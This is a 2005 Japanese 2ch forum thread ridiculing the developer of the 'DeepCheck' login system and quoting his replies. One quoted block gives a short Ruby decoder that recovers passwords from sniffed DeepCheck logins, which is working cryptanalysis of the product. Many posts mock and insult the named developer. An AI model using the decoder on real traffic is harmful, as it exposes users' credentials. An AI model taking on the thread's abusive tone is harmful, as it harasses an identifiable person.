【本人】DeepCheckってどうよ?2本目【認証】
1 :
ウラモティチルドレン :
2005/11/17(木) 23:14:28
2 :
名無しさん@お腹いっぱい。 :2005/11/17(木) 23:25:44
おkですね^^
3 :
名無しさん@お腹いっぱい。 :2005/11/17(木) 23:28:57
ノ \三三ト、 /--,, れ / ,,_''- ,,_ ̄i =--/ ノ ノ レ >''' ̄\ ''- ,, | ,,r--,,,_ ノ ┃'- ├t弋ァ }//-丶, ! \ _ / 丶-< { うヽ } ,,, ''' 'T (赤っ恥) ト、| r─'( __ } ''-イ  ̄ヽ ''ー'' \ | \__ /''T ,/ "T-、 \_ , (幻 想) -r 丶 ト-=''''-'' }浦 ̄--'''' (無 能) ノ ,. ヘ jヽ, }\ ヽ 本 \/| ↑ /\ \ 勝 | ( ↑ / \ / 久 | ) ( / \  ̄ ̄ ̄ ̄ ̄ ( ) /_ \ ) ( ウラモティチルドレン  ̄ | 信 残 引| ̄ ノ⌒ ̄⌒γ⌒ ̄⌒ゝ / / | 用 り 退| ノ DeepCheck ゝ / / | と 少 の| 丿 ゞ _/ ∠ | 信 な 義| 丿/|/|/|/|\|\|\|\|\ゝ .\ / | 頼 い 務| │ V ――| を 資 、|――――――――――┼――――――――――――――――― / 失 金 背ヽ 巛巛巛巛巛巛巛巛 人巛巛巛巛巛巛巛巛巛巛エクスファの総力 う と 水 毛 の 髪 陣
浦本、最近言動がおかしくないか? あきらかにイライラしてるように見える。 自殺だけは止めろよ〜。
5 :
名無しさん@お腹いっぱい。 :2005/11/18(金) 00:25:56
『DeepCheckの全て』 ■クライアント部 認証情報を設定/変更する入力インターフェースパネル。 おそらくキーロガー対策でこのような形式になっていると思われるが、マウス操作のモニタリングや画面キャプチャに対しては何の手立てもない。 操作も複雑でありユーザビリティのかけらもない。 本システムの中で最も必要性の感じられない部分である。 さらにユーザに了解を取らずにMACアドレスの収集も行っている。 ■通信部 独自暗号方式を用いた通信。 しかし流れているのは数回のモニタリングで解読できるデータであり、盗聴に極めて弱い。 本システムの中で最も脆弱な部分である。 ■サーバ部 認証情報を複数のDBに分散格納する。 複数DBに格納することが安全性を高めるとうたわれているが、その複数DBすべてを攻撃されたら元も子もない。 例えばかなり大規模に100のDBに認証データを分散格納したとする。これではただ単にセキュリティ強度が100倍になっただけである。 その他既存の暗号アルゴリズム/セキュリティシステムを使えばセキュリティ強度はNのオーダー以上で増加していくことは明白である。 本システムの中で最も技術的に稚拙な部分である。
6 :
名無しさん@お腹いっぱい。 :2005/11/18(金) 00:26:34
ウラモティ憲法<草案> 一条.嘘はつくな。 ニ条.身の程を知れ。 三条.責任感を持て。 四条.学習を怠るな。 五条.開き直るな。 六条.誠意を持て。 七条.約束は守れ。 八条.言い訳はするな。 九条.毛髪の放棄。 十条.犯罪は犯すな。
7 :
ウラモティ語録 :2005/11/18(金) 00:31:16
> 一言ついでに、どなたか、DeepCheckかDeepCheckBase を > 破られれば、私は一言も無くやめますが。
8 :
ウラモティ語録 :2005/11/18(金) 00:32:50
>
>>713 これでも、まあまあの人脈があるんだよ。
>証拠前に何回もさらしたでしょ!
>たとえば、こんな幼稚な人間になんで何年もただでオフイス貸してくれたのかな?
>アップルさんが。
↑
ただの派遣社員w
9 :
ウラモティ語録 :2005/11/18(金) 00:35:42
>
>>81 jda.go.jp さん、たまにアクセスありますです。
>国防系だったら無償提供します。
↑
オープンソースが何たるかを理解できていないことが良く分かる発言w
>でも、まだ、コンタクト無し。
>場所近いんだけど。(件ケー無い。)
↑
身のほど知らず、ほんとバカw
10 :
ウラモティ語録 :2005/11/18(金) 08:58:33
799 uramoty
[email protected] 2005/11/13(日) 12:10:41
>>798 オレ今気分が悪いんだ。ぞんざいになるけどゆるしてくれ。
読んでないけど?
読まないとBIND書けないとでもいいたいのかな?
あるいは、MacOS X Server 使ってんだけど、そのGUIで設定してるんだ。
それで、メチャクチャなら、アップルにいってくれ!
それで、メチャクチャなら、アップルにいってくれ!
それで、メチャクチャなら、アップルにいってくれ!
それで、メチャクチャなら、アップルにいってくれ!
それで、メチャクチャなら、アップルにいってくれ!
それで、メチャクチャなら、アップルにいってくれ!
994 名前:uramoty[
[email protected] ] 投稿日:2005/11/19(土) 12:05:25
調子こいて申し訳ないんだけど、以前、電車男的な書籍化プロジェクトを提案した事があったんだけど、
偶然の偶然で、なんと話ししてた社長さんとこで電車男が出版された。俺に隠してたんだな!
>>11 浦本、そんなあからさまな嘘ついてまで話題作らなくて良いよ。
全部張っといてあげる親切なおれw 994 名前:uramoty :2005/11/19(土) 12:05:25 調子こいて申し訳ないんだけど、以前、電車男的な書籍化プロジェクトを提案した事があったんだけど、 偶然の偶然で、なんと話ししてた社長さんとこで電車男が出版された。俺に隠してたんだな!ま、それは良いとして、 「DeepCheck」をこの板のみんなと一緒に進めてみたくなってるんだ。 罵詈雑言が返ってくるとは予想なのだけど、俺いま金ねーからさ。人雇えないし。 出世払いにしたい訳だ。 どっか決まったら、2ch deepchecker glue みたいな名前で基金つくってさ。 世間から屑あつかいされる代物を色眼鏡無しで評価し、本物だったら支援する、見たいな。 そういうのの先駆け、みたいのやりたいんだ。固まったら、支援企業を数社くっつける。 ふざけた話しだと思いながらも、ちょっとケントーしてけれ。 お願い申し上げます。
>>999 ありがとんずら。
>>12 やはりそう見えますか。
>>1990 年代のパソコン雑誌(もちアナログ:国会図書館なんかにある)を見ると嘘かどうかすぐ解る。
>>14 具体的な雑誌名と何ページ目にあるのかを明記しろ。
別に「電車男出版社」と限定してないですからね。 当然、話しはするけど。
>>15 お前、バカにされてるのが理解できないの?
やっぱ、コミュニケーション能力0だな。
>>18 他人をバカにするものではない。
相手がバカに思えるのは、己がバカだから。
>>19 いま、そこの社長とケンカ状態なのさ。だから宣伝したくない。
心は広い男だから、こちらから声書ければ、話しは出来る。
おい、バカモト。 テンプレに何か言い返さないのか?
>>22 そんなことはどうでも良いんだよ。
雑誌名を出せ。
ソースがなければ、お前の妄想だと言われても反論できないだろ。
そもそも、雑誌名出しただけで宣伝になるのか?
2chに来てるのにテンプレも知らない浦本カワイソス
>> 25 あ、勘違い。証拠の方の雑誌名ね。 だったら、日経Macやマックワールドやアスキーや、ほとんどに何度も出てるよ。 「電車男出版社」の敷地内に一時会社を置いていたんで、セミナーやら商品説明会をやるたびに 各誌に紹介していただいた。
ダメだ飽きた
29 :
名無しさん@お腹いっぱい。 :2005/11/19(土) 12:42:22
やっとネット開通したと思ったら今度は金の無心……いやただの詐欺行為か
× 一時会社を置いていたんで、 ○ 派遣社員として雇われていたので、
ご面。ちょっと出かけなければならなくなってしまった。 夕方には戻れると思います。
まさか浦本に金をせびられるとは思わなかった…。(笑) もうバカの極地にいっちゃったのね〜〜。
34 :
名無しさん@お腹いっぱい。 :2005/11/19(土) 17:29:07
>>29 >やっとネット開通したと思ったら今度は金の無心……いやただの詐欺行為か
やっぱり詐欺っぽいなぁ…。
DeepCheckなんかで金が儲かる分けないもん。
嘘ですよ。 かかってきなさい。
嘘ってなんですか?還元はしないってこと? すでに金銭のやり取りをした人が居たならこれはもう警察通報に値するけどねぇ。
まぁ8000万使い込んでバッくれた佐川さんよりはましですよ!
ウラモチーの受け答えって、なんかいつも「ズレてる」んだよねー それが、人の怒りを買う主原因だと思うんだな。
DeepCheck+のリリースを月曜日に予定していますが、数日ずれ込む感じです。少しアルバイトを
させてください。
すみません。
明日朝(2:00〜9:00)『はやぶさ』のライブ中継を
ttp://jaxa.tv/ でやるんだってさ。
宇宙航空開発機構(jaxa.jp)さんにも、ものずきな人がいるようで、ブログ(
ttp://uramoty.exblog.jp/ )の常連さんです。
ついででなんですが、こちらのIPをのっけてから、445や135をつかって接続にくる強者、極端に増加。 引けば解るとはいえ、IPを晒すと良い事は少ない。 125.100.*.* からのが際立って目立つ。
60.239.251.218 が辞書スキャンしてますw。
つーか普通にBotNetだろう。
60.239.251.218 からのスキャンがいま、終わりました。
この程度では壁は破れないんだけど、パッケットを観てるのが面白くなくなりますね。
>>44 60.239.251.218はボットでしょうね。たしかに。
ただ、攻め方がオレより幼稚園で、いまどきねってかんじですw。
あ、もしかしたら、Mac Address 取れるか試してたりして。 この程度の攻撃でいちいちとってたら、それだけで、ウチの貧弱なハード軍はダウンです〜。
ハゲモトは、ボットネットが何か知らないご様子。
>>47 そうですか。
ハゲモトで思い出したけど、みなさんにおお嘘こいてたのイッ毛あります。
磯野とおさんのようにオツムは輝いていない。ごく一般的にあります。
さきほど書いた雑誌のいくつかに当時の社員さんと写ってるのがあり、社員さんのひとりにハゲてんの
目立つ位置に写っており、間違われるとカワイソなので、告白です。ハゲではありませ〜ん。
申し訳ない。
>少しアルバイトを 空き缶拾いのバイトか?がんばれよ。
>どっか決まったら、2ch deepchecker glue みたいな名前で基金つくってさ。 >世間から屑あつかいされる代物を色眼鏡無しで評価し、本物だったら支援する、見たいな。 >そういうのの先駆け、みたいのやりたいんだ。 お前ごときが評価だと? 身の程を知れ。阿呆が。 >固まったら、支援企業を数社くっつける。 どこのペーパー会社だよ。
>世間から屑あつかいされる代物 これってもしかして、DeepCheckのことか? まぁ、「屑あつかい」じゃなくて「クズそのもの」なんだけどな。
>みなさんにおお嘘こいてたのイッ毛あります。 日本語で書けよ。ハゲ。
いろいろ、ゴチャゴチャと、ね。 これが記名だったら面白いことになるね。オイラが恥さらしか、あんたらが、*** か。 おいおい解る訳だ。 しかし、memo のあの教授も、よく言い切ったね。あんたら(50、51)と同類なのかな?
おいおい怒るなよ。禿げるぞ。 で、俺が***(なんだこれ?)なのは、いつ頃分かるんですか? あと、教授って誰のことだ? あのスレッドくだらなすぎてちゃんと読んでないんだよ。 おしえてくれよ。なぁ。
258 名前:175[sage] 投稿日:2005/10/31(月) 01:26:59 とりあえず sniff の結果から可視化するコード置いときますね。 def uramoty_encode(pattern, ary) chrtable = '0123456789abcdefghijklmnopqrstuvwxyz' ary.map {|x| chrtable[(x+pattern)%36]}.pack('c*') end def str_to_intarray(str) str.split(/,/).map {|str| str.to_i} end def encode_login_session(hMypassword,patternStr,&block) pattern = str_to_intarray(patternStr) password = str_to_intarray(hMypassword) pattern.each {|pat| yield uramoty_encode(pat, password) } end # 使い方の例 encode_login_session('37,37,34,117,117,116,116', '33,6,8,18,22') {|x| p x} print "\n------\n" encode_login_session('20,20,19,19,32,35,33,22,10', '29,31,13,4,34') {|x| p x}
259 名前:175 ◆WDHu3/mYsI [sage] 投稿日:2005/10/31(月) 01:32:34
で、可視化してみてわかったんだけど、
>>37 から簡単にわかっちゃうね。
何行目かって情報もパスワードも。パスワードはトリップにしときますね。
別にデモサイト落ちててもいいや。
運が悪いと2回連続で sniff しただけじゃ足りないんだろうけど、
>>37 の
ケースは2回連続で十分だ。
パスワード3つを A, B, C とすると
1回目のログインでは A と B をくっつけたものを使ってる。
2回目のログインでは B と C をくっつけたものを使ってる。
出てきたものをよく見て B を探しtうわなにをするやめqあwせdrftgyふじこlp
260 名前:175 ◆WDHu3/mYsI [sage] 投稿日:2005/10/31(月) 01:33:19
>>259 トリップにしたのは C だ。最後に設定した次回パスワード。
>>45 スキャンで壁が破れるのか。。。スゴスw
>>60 スキャンの意味を理解してないんだろモティは
攻撃とか言っちゃってるしw
>>60 あれ!ポートをこじ開けるにはトンネリングか、相手から開けさせるしかない訳だから、開いてるの探すの
常道じゃないの?
ま、そんなkとはどうでもよいので。
>>54 さん、ヒッカケてもだめです。
事実であってもなくても、この板のようにオイラのことや「DeepCheck」の事を誹謗中傷すると
刑事罰になる可能性があるんだってさ。きをつけなさい。
だから、memo の教授の名前は開かせないね。memo 読んだらすぐ解るよ。
学生はすきだけど、どうも memo の若い人達は煽動に弱いよね。自分の目を持ってない。
しかも記名だから、おべんちゃらめいてさ。
その点、この板は、本音っぽさ満載だからね。書きがいあるよ。
ただ少し心配なのは、本気で「DeepCheck」に可能性が無いと思ってたら、イジっても、面白くないよ。
>>61 ばか!
おれも結構スキャンするけど、スキャンしただけで、訴えられるんだってさ。
クラッキングの前準備と取られるんだと。
>>62 >「DeepCheck」の事を誹謗中傷すると
>刑事罰になる
どういった罰になるのか詳しく。
>>63 ほへーそうなん?
被害がないのに誰がどうやって訴えるんだろう…
>どうも memo の若い人達は煽動に弱いよね。自分の目を持ってない。 これもついでに詳しく教えてくれ。 具体的に理由もきちんと添えて。
>>62 もう少しセキュリティの勉強をした方が恥をかかなくて良いと思うんだ。
どうも、基本的なことを知らないんだよね。用語とか勝手な解釈をしてるし。
>>62 スキャンは攻撃の前段階であることは否定しない。
しかしスキャンは調査であって、攻撃ではない。
攻撃でないものを「攻撃だ!幼稚だ!」とか騒いでるのがばかっぽい、とw
わかるかな〜
スキャンなんてものはきょうび、日常的に行われているものだから
多少のスキャンでは何も対処しないのが普通。
また、スキャンごときで対処しなくてもいいようにネットワークのセキュリティを設定する。
こういった状況なのは分かってる?
>>69 も言っているように少々スキャンが来たくらいで
ギャーギャー騒ぐのは「自分は初心者です」と宣伝しているようなもの。
sshのパスワード認証に対する辞書攻撃なんて毎日来てるだろ。
>>43 > 60.239.251.218 が辞書スキャンしてますw。
もしかして辞書攻撃とポートスキャンの区別もついてないのでわw
ニョガーン
>>64 前スレの
>>970 と、
>>972 で決着したでしょう。
他は答えるかちなし。あんたらのおもちゃじゃないだから。
>>410 や
>>970 など、これは力があると思えるけど、わんわん、きゃんきゃんじゃね。
たんなるヨタじゃないですか。
今後は無視します。
強はこれくらいで。そろそろ。仕事にかからないとね。
>>浦本さん MorphyOneって知ってますか?
>>73 全然決着してない。
970の問いに対して、972は全く回答になっていない。
> 970 :956:2005/11/18(金) 08:02:45
>
>>968 > おはやう、うらもとさん
>
>
ttp://deepcheck.x-fer.co.jp:8084/noiselethtml/event.html >
> > ura というアカウントのカーソル行番号を5番へ変更させたチャレンジャーが勝利。他は負けというルールです。
>
> このルールでは解読する意味が無いと思うのですが、解かります?
>
> あくまで主観ですが、このルールではBrute Forse Attack以外こちら勝ち目はありません
> 論拠はこのスレを再度読み直して頂ければ解かると思います
> 972 :uramoty:2005/11/18(金) 08:22:51
>
>>970 おはようさんです。
> かなりニアミス、いや、ほとんど正解でしょう。しかしながら、
> > ura というアカウントのカーソル行番号を5番へ変更させたチャレンジャーが勝利。
> >他は負けというルールです。
> は、このまま続行させてもらいますが、こちらでは、Mac Address キャッチ という煙幕が意外と
> 効果的だったという事にして、ご教示も頂いた事だし、先に駒を進める事を検討させていただきます。
↑ルールの疑問への回答がまったく無いんですよ、浦本さん。
MACで煙幕とか関係ないし意味不明だからホント勘弁してw
googleでDeepCheckを検索すると2chのスレがトップ10に入るのに、ふざけた受け答えばっかりして大丈夫なの? 自分で自分の首を締めてるね。
そらきた。自分の都合が悪くなると逃げる。 ま、無視してくれても良いけどね。 あんたのセキュリティの知識、技術なんてそんなものだ。 あと、前スレの410をことさら持ち上げているようだが、解読されたのはもっと前だからな。 よく読んでみなよ。 それから、前スレの972で言いたいのは 「MACアドレスを取っているという情報で解読されたことを煙に巻きました」 ってことですか? あなたには誠実さのかけらもないんですね。
この人ほんと誠意のない人間だ。。。
>>77 >自分の都合が悪くなると逃げる。
あなたからみてそう見えるだけだって事も解ってないんだね。
memo レベルの反応は意外だったけど、言葉や知識でモノは作れないよ。
また、セキュリティ=暗号の高度化と思い込んだ人がいかに多いか、はっきりしただけでも、nemo への
投稿は意味があった。
DeepCheckを発表する事でオイラが言いたかった事は、暗号やらセキュリティやら騒いでいるけど、
騒いでるわりには、
>暗号コミュニティーでは、SHA1が2010年以降まで生き延びるのは難しいという意見が大勢を占めており
とかへの反応が目立たない。
流れにそったものにはそれなりの反応が出来るけど、毛色の変わったものに対しては、どう対応してよいか解らない為、
目的と目標を取り違え、否定的発言を声高に繰り返す。
うすっぺらなゾーンが我が国の一部にもあった、というだけの事だけどね。
うん、分かったから、
>>56-59 をよろしく。
上でも言われてるけど、前スレの972は全然答えになってないよ。
970の質問と972の答えが合ってない。
>>81 あなたは何様なの?
>前スレの972は全然答えになってないよ。 970の質問と972の答えが合ってない。
とか書いてるけど、解るやつには解る訳だ。
わからないんだったら、答えてない、なんて。
書くなよ。
>>82 わかるやつがいるならまぁいいんだけど、多くの人はわからないと思うよ。
だから、浦本さんにはちゃんと説明する責任があると思う。
ハイ、972の意味が分かるひと、手あげてー!!
>>80 >
>>77 >自分の都合が悪くなると逃げる。
> あなたからみてそう見えるだけだって事も解ってないんだね。
あんたにどう解釈されても良いけど、一般的に見てあんたは誠意に欠ける言動をとっている。
> memo レベルの反応は意外だったけど、言葉や知識でモノは作れないよ。
誰も言葉の話なんかしてませんが。
あと、知識なくしてモノは作れませんが。もちろんあんたのような低レベルの知識ではないよ。
> また、セキュリティ=暗号の高度化と思い込んだ人がいかに多いか、はっきりしただけでも、nemo への
> 投稿は意味があった。
「セキュリティ=暗号の高度化」が問題ならば、その問題点と影響を具体的に例示すること。
前にも言ったんだけど、無視されたんだよな。
> DeepCheckを発表する事でオイラが言いたかった事は、暗号やらセキュリティやら騒いでいるけど、
> 騒いでるわりには、
> >暗号コミュニティーでは、SHA1が2010年以降まで生き延びるのは難しいという意見が大勢を占めており
> とかへの反応が目立たない。
あなたからそう見えるだけだって事も分かってないんだね。
> 流れにそったものにはそれなりの反応が出来るけど、毛色の変わったものに対しては、どう対応してよいか解らない為、
> 目的と目標を取り違え、否定的発言を声高に繰り返す。
そりゃあ、セキュリティの強度を具体的に示さずに(示せずに)「安全だ安全だ」って
言ってるだけのものだからそういった反応があって当然。
> うすっぺらなゾーンが我が国の一部にもあった、というだけの事だけどね。
うすっぺらとは?
・・・シーン・・・・
浦本が
>>970 の意味を理解できないんだから先に進みようが無い。
>>83 さん。ホットする意見だ。
>>410 さんや、
>>970 さんのように俺に解るように説明してくれ。
>>410 さんは、ほとんど詰んだ。(あくまで気丈演習だけど、たいしたものだ。)
>>970 さんは、
>>410 さんがこちらにスパイウエアを仕掛ける危険から410さんを守った。
>浦本さんにはちゃんと説明する責任があると思う。
ぜひ、お願い申し上げます。
>>88 > >浦本さんにはちゃんと説明する責任があると思う。
> ぜひ、お願い申し上げます。
ごめん。この受け答えは絶対に日本語的につながらないと思うんだ。
もしかして、浦本さんって日本人じゃないんですか?
>>88 > >浦本さんにはちゃんと説明する責任があると思う。
>
> ぜひ、お願い申し上げます。
日本語大丈夫???
>気丈演習 詳しく。
>>89 何が「は ぁ ?」だ。
日本語の解らない書けないオイラを相手にしているあなたも、「は ぁ ?」ナノが、わかってないんだよ。
都合の良い事に 2ch は、解る解らないの場じゃないしね。
>>93 >都合の良い事に 2ch は、解る解らないの場じゃないしね。
お前は何を言っているんだ。
浦本さんと話してるとこちらまで頭がおかしくなった感じがするね。 完全に論理破綻してるというか。
>日本語の解らない書けないオイラ なるほど
>>ははは、シクってしまった。「机上」でした。ごめんなさい。
浦本さん!
>>90-91 にも早く反論してください!!
こんな奴らやっつけてやりましょう!
頭がおかしいのは初めから1人だけだから安心しろ 相手にしても時間の無駄だってようやく気づいたよ
>> 99 そうだな。
なまえ:うらもと かみのけ:1 じゅもん:メダパニ メガンテ パルプンテ
こんにちは!他スレで誰か誤爆したようでつられてやってきました!
僕も
>>972 のこと全然分からないのですが浦本さn教えてください!
>>73 >今後は無視します。
無視できてないし。顔真っ赤だよ?
>強はこれくらいで。そろそろ。仕事にかからないとね。
今後は弱でお願いします。
56歳現役マか・・・・。 そこまでくると職人の域だな。
ウラチン、仕事なんてあるのかなぁ・・・
エクスファのサイトに今までに受けた仕事の内容書いてあったけど、 こんな人とじゃ打ち合わせもマトモに出来ないだろうし、 無茶苦茶なものを納品されたんだろうなって、容易に想像が付くね。
>>109 そういや、カトラーは還暦すぎても未だに第一線で働いてるんだよな。
対して浦本はこのダメダメ度・・・。
115 :
前410 :2005/11/20(日) 00:41:12
>>88 俺はあれからもうデモサイトどころかエクスファ系のサイトにアクセスしてないわけだがw
で、論理的に破れることが分かったら、俺にはそれでもう十分だって何度言ったらわかるんだ?
DeepCheckは終わったって何度言ったらわかるんだ?
あと
> >浦本さんにはちゃんと説明する責任があると思う。
>
> ぜひ、お願い申し上げます。
これは「ここの住人が浦本にちゃんと説明する責任」じゃなくて「浦本がここの住人にちゃんと説明する責任」っていう日本語なんだよw
お願い申し上げますじゃねーよw
ァ ∧_∧ ァ,、
,、'` ( ´∀`) ,、'`
'` ( ⊃ ⊂) '`
浦本さん、本当にセキュリティでお金貰うなら、 用語・概念の勉強だけでもきっちりやった方が良いよ。 打ち合わせの時や資料作成の時に困るよ。
浦本さん、ひょっとして本当に外国人なのかな。 別に外国人だからダメってことはないけれど、 あまりにも日本語が通じないというか・・・
外国人には論理が通用するけど、uramotyには論理が通用しない。 論理もダメ、言葉もダメ、これじゃまともなコミュニケーションが成り立つはずがない。
ウラモティはお金に困っているならまずそのMacを売ってお金を得るべきだね
>>117 就職板かw
そういやエクスファは人材募集してないのかな
>>112 だって、顧客との話で「担当者と喧嘩中」「追い出されるように去ることになった」「プレゼンしたら1分で論破された」など数々の武勇伝があるくらいだもん。
何度バカにされ何度ハジをかいてきたんだろう。。。
たぶんPCの前で顔真っ赤にして怒りをこらえながら書きこみしてんだろうなぁ、56歳のおじさんが(笑)
浦本さんのレスが途絶えた・・・。 ふて寝したかな。
てか、そんな実績あるんだったら職安→即戦力コースで定年まで安定じゃね? 1,2年働いて実績つけたら後は若い連中に仕事押し付けてのんびり給料もらってりゃいいんじゃ なんでここまでボコボコに叩かれとるんだw
あと、職安は決して恥ずべきところじゃないぞ。
>>60-120 あたりがすげぇおもしろいw
さっきから何度も読み返してる俺ガイル
>>125 むしろウラモティは、叩かれるのが好きなんじゃないかな。
「叩かれながらも…」ということにマゾな悦びを感じていると思われw
将来プロジェクトXにでも出るつもりかしら。
http://uramoty.blogspot.com/ > 金はない、ネームバリューもない、スタッフもない、地位も無い状況の中で、
> 少しばかりの経験と知識、ほんのひとにぎりの人脈を武器に、発想を事業化する。
> ほとんどの人が笑って酒の肴にでもするような事にあえて挑もう。
> これは、そのほぼリアルタイムな奮戦記である。
>>53 > しかし、memo のあの教授も、よく言い切ったね。あんたら(50、51)と同類なのかな?
なんでいきなりmemoの話が…?memoのMLで何か発言があったの?
マゾ疑惑は1年前もあったYO。 > これは私の心のうちに秘めておこうと思ったけど、やっぱりここで公表するよ。 > 一連のウラモティのサヨナラ騒動、そして電撃的再降臨に秘められた事実を。 > > 思い切って告白しよう。実は、ウラモティはマゾなんだよ。 > このスレで煽られ、叩かれるたびにキーボードの前のウラモティの呼吸は荒くなる。 > そして呼吸が最高潮に達したとき、白く美しい快楽の腋がウラモティの躰から迸る。 > ウラモティ哲学において、平和主義とマゾヒズムは同義なんだ。 > 考えてごらん、世界中の人々がマゾヒストならば戦争なんか起こり得ないんだよ。 > 「右の頬を打たれたら、後の穴を差し出せ」あまりに有名なウラモティの言葉だ。 > > もう分かっただろ、今回の騒動の背景を。 > そう、ウラモティは公言を覆すという卑怯な行為を敢えてすることで > さらなる煽り、さらなる叩き、すなわちさらなる快楽を求めたんだよ。 > そしてそれは世界平和につながる。マゾヒズムとはそういうものさ。 これは、ウラモティが怒って「もう2chとはサヨナラだ」と言ったのにすぐ戻ってきやがった時の投稿らすぃ。
>>129 さぁ?とりえあえず逆恨みだと思う。
memoのほうではDeepCheckの宣伝をしても皆が皆「興味ない」の一言。
あの時のウラモティ、情けなかったなぁ…。
132 :
名無しさん@お腹いっぱい。 :2005/11/20(日) 01:43:19
なまえ :うらもと ねんれい:56 かみのけ:1 じゅもん:メダパニ メガンテ パルプンテ ぞくせい:マゾ じんしゅ:なぞ
俺的に今日の一番ぶっ飛んだウラモティ発言。
93 名前:uramoty[
[email protected] ] 投稿日:2005/11/20(日) 00:18:30
>>89 何が「は ぁ ?」だ。
日本語の解らない書けないオイラを相手にしているあなたも、「は ぁ ?」ナノが、わかってないんだよ。
都合の良い事に 2ch は、解る解らないの場じゃないしね。
こんなスレがあるとは・・
ウラモティ、唯一の大発明 『メールの署名欄を広告(10行程…)に利用する。私信にも利用する。』 すごいと言わざるを得ない。一般人には思いつかないその発想。 まさにスパム業者の視点! 他人のことを考えないヒトデナシの視点!
ウラモティ、唯一のギャグ 『うれし泣きシリーズ』 こりゃワロタ、ネーミングセンスにテラワロタw
>>127 浦本のぶっこわれ方では1年前のほうがもっと凄かった。いや、もっと笑えた!
毎日毎日浦本の書き込みを見るたびに、
;`;:゙;`(;゚;ж;゚; )プピー!!
だったからなぁ…。
今は、浦本に都合の悪い書き込みにはレスしないようにしてるみたいだ。
レスがされなかった書き込みこそ、真実を突いていると思って見てみると、確かにナルホドと思うよ。
で、職安で仕事もらえたのかな? またワガママを言って他人を困らせてるんだろうなぁ、ほんとダメなやつだなぁ。
ちなみに浦本さんて独身なんかなぁ
おれは DeepCheck+ を楽しみに待ってるよ。 HMAC や DH ぐらい使ってくれるかもしれないじゃないか。 内容が正しければ誰が言ったことかなんて些細な問題だ。410,410連発する のは、前410氏が俺のよりずっとわかりやすい説明だったからだな。 俺のコードは uramoty には読みづらかったようだ。encode って名前で decode してたり、pattrn じゃなくて pattern ってスペル使っちゃったの は悪かった。ブロック付メソッドなんて使ったのも悪かったよ。
MN8300 と ThinkPad 21m の調子はどうだい? 達者でな
浦本さん、早く起きてくださいYO! そんでウラモティをいじめる悪いやつらに反論だ!
>>137 一年前の過去ログとかってありませんかね…
今日はウラモ氏は寝たきり?
なまえ :うらもと ねんれい:56さい かみのけ:1ぽん ぞくせい:マゾ じゅもん:メダパニ メガンテ パルプンテ じゅつ :えんまく じんしゅ:なぞ ことば :なぞ ごじ :たくさん じしん :まんまん
>>浦本 俺はこれから出かけるが、俺が帰ってくる前には何かレスしておけよ
良いバイトが見つかったんじゃないかな? もうDeepCheckなんてどうでもよくなったとか。  ̄ ̄ ̄ ̄ ̄ ̄ ̄○ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ O /⌒ヽ o / ´_ゝ`) ナーンテネ、フフ ブッ| / ε=と__)__) 旦
今日は浦本はバイトか。
>>151 さん
そう、バイトで今日はあまり書けなかった。済まん。
途中、高橋Qチャンを見に行った。根性のあるやつだ。素直に敬服する。
あのプレッシャーは並大抵のものではなかったが、見事にはねのけた。
まだバイト相当書かなきゃならんので、本日は、これにて。
>>152 まったくだ。
あんたの娘くらいの年齢なのにがんばってるなぁ。
彼女はホント有言実行の精神の持ち主だよ。
あんたも自分が言ったことくらいは守ろうね。それじゃなきゃただのウソツキおじさんじゃんか。
彼女の足元にもおよばない中年男から脱皮しなきゃね。
久しぶりに浦本MLでメールが来たと思ったら、スパムだった。
>154 勝久からのメールジャマイカ?
>>154 さん
すんま村。気づいたときは遅かった。
FWでいつもは、smtp止めてんだけど、止め忘れたみたい。
deepchecker-ML に謝罪メールながそうと思ったけど、かえって邪魔臭いことになると思い、敢えて、流していません。
今後、さらに気をつけます。
しかし、spam 業者さんも必至とあって、あのてこの手をおもいつくな〜!
感心しては拙いのだろうけど。
157 :
名無しさん@お腹いっぱい。 :2005/11/21(月) 11:13:09
ほう!!!! FireWall で SMTP を止めていると!!!! メーリングリストを稼動させているのに!!!!!!!!!! しかも気づいていれば止められたのか? ってことはモデレートでもしているのか? 気づかずにspamを放流した??じゃあモデレートじゃないのか?????? いやあ、相変わらず浦本はまともなことが何も言えないんですね。
>>157 問題提起ありがとう。
deepchecker-ML の多重送付問題がクリアされるまで暫定的に取らしていただいている処置です。
他意はありません。
MLの流量が少ないのは、競合関係にある会社さんの方が相当多いので、ROM 専門になりがちとも思えます。
159 :
名無しさん@お腹いっぱい。 :2005/11/21(月) 11:49:44
多重送付て。FireWall関係無いだろ。 てか、競合関係て。そんな低レベルな競合してる他社なんかねえだろ。 ぶっちゃけDeepCheckってのは、シーザー暗号で次回パスワードつきのログイン操作を 糞みたいに使いづらいUAでしかもアプレットでやらかしているだけのブツだ。 そんなもん、誰とも競合しねえよ。DeepCheckのセキュリティレベルは「Sniffされたら終了」 ってくらいのレベルでしかないことはすでに明らかなんだし。
160 :
名無しさん@お腹いっぱい。 :2005/11/21(月) 12:00:12
UI の画面を見てないんで可能性レベルだが、アプレットを馬鹿が書くと特定サーバから 呼び出したときしかまともに動かなくなる。浦本がそこまで考えているとは思えんので、 おそらくエクスファの鯖から読まなきゃいけないアプレットになっているんだろう。 (DNSを腐らせたときの対応からも見て取れる。ふつうは IP Address ベースでも使えるように書く) となるとパッケージでは売れないということになる。毎回カスタマイズしなきゃならんのだからな。 さて、浦本のコーディング能力をここまで見せられて、カスタマイズ込みで発注できるかな? ふつうはそんな危ない橋は渡らない。セキュリティ的な強度だけでなく、腐れUIや技術的背景など、 マイナス要因は山積になっているのに、プラス要因が何もない。 なにもないんだよ。ウリになるポイントが。
これまでの流れを全く読んでないのだけど問いかけてみる。 DeepCheckって面倒じゃない? 使い方見て一瞬で使いたくなくなったんだけど。
>>160 教えてほしいのですが、
> ふつうは IP Address ベースでも使えるように書く
へ〜、そうなんだ、私は経験からIPのハードコードはしないな。
規模が膨らんだりしたらアウトだと思います。
そうか、おれは、このレベルを相手にしてたのか!
アホクサ!
>>162 うん、そうでしょうね。使い易いモノは、危ないんです。
つきつめると。
ストレートな感想が聞けるのは有難いです。
今から出かけます。 申し訳ない。
166 :
名無しさん@お腹いっぱい。 :2005/11/21(月) 13:07:34
ああ、せっかく
>>157 で間違いを教えてやったのに
>>158 で素っ頓狂な回答を返された。ものすごく嫌な思いをしたよ。
167 :
名無しさん@お腹いっぱい。 :2005/11/21(月) 13:08:29
>>163 ハードコードする発想しか出て来ないのが馬鹿だってんだよ。
普通はパラメータ渡しできるようにして、「IP Address ベース *でも*」動くようにする。
お前、ローカル環境でテストしてねえだろ?
168 :
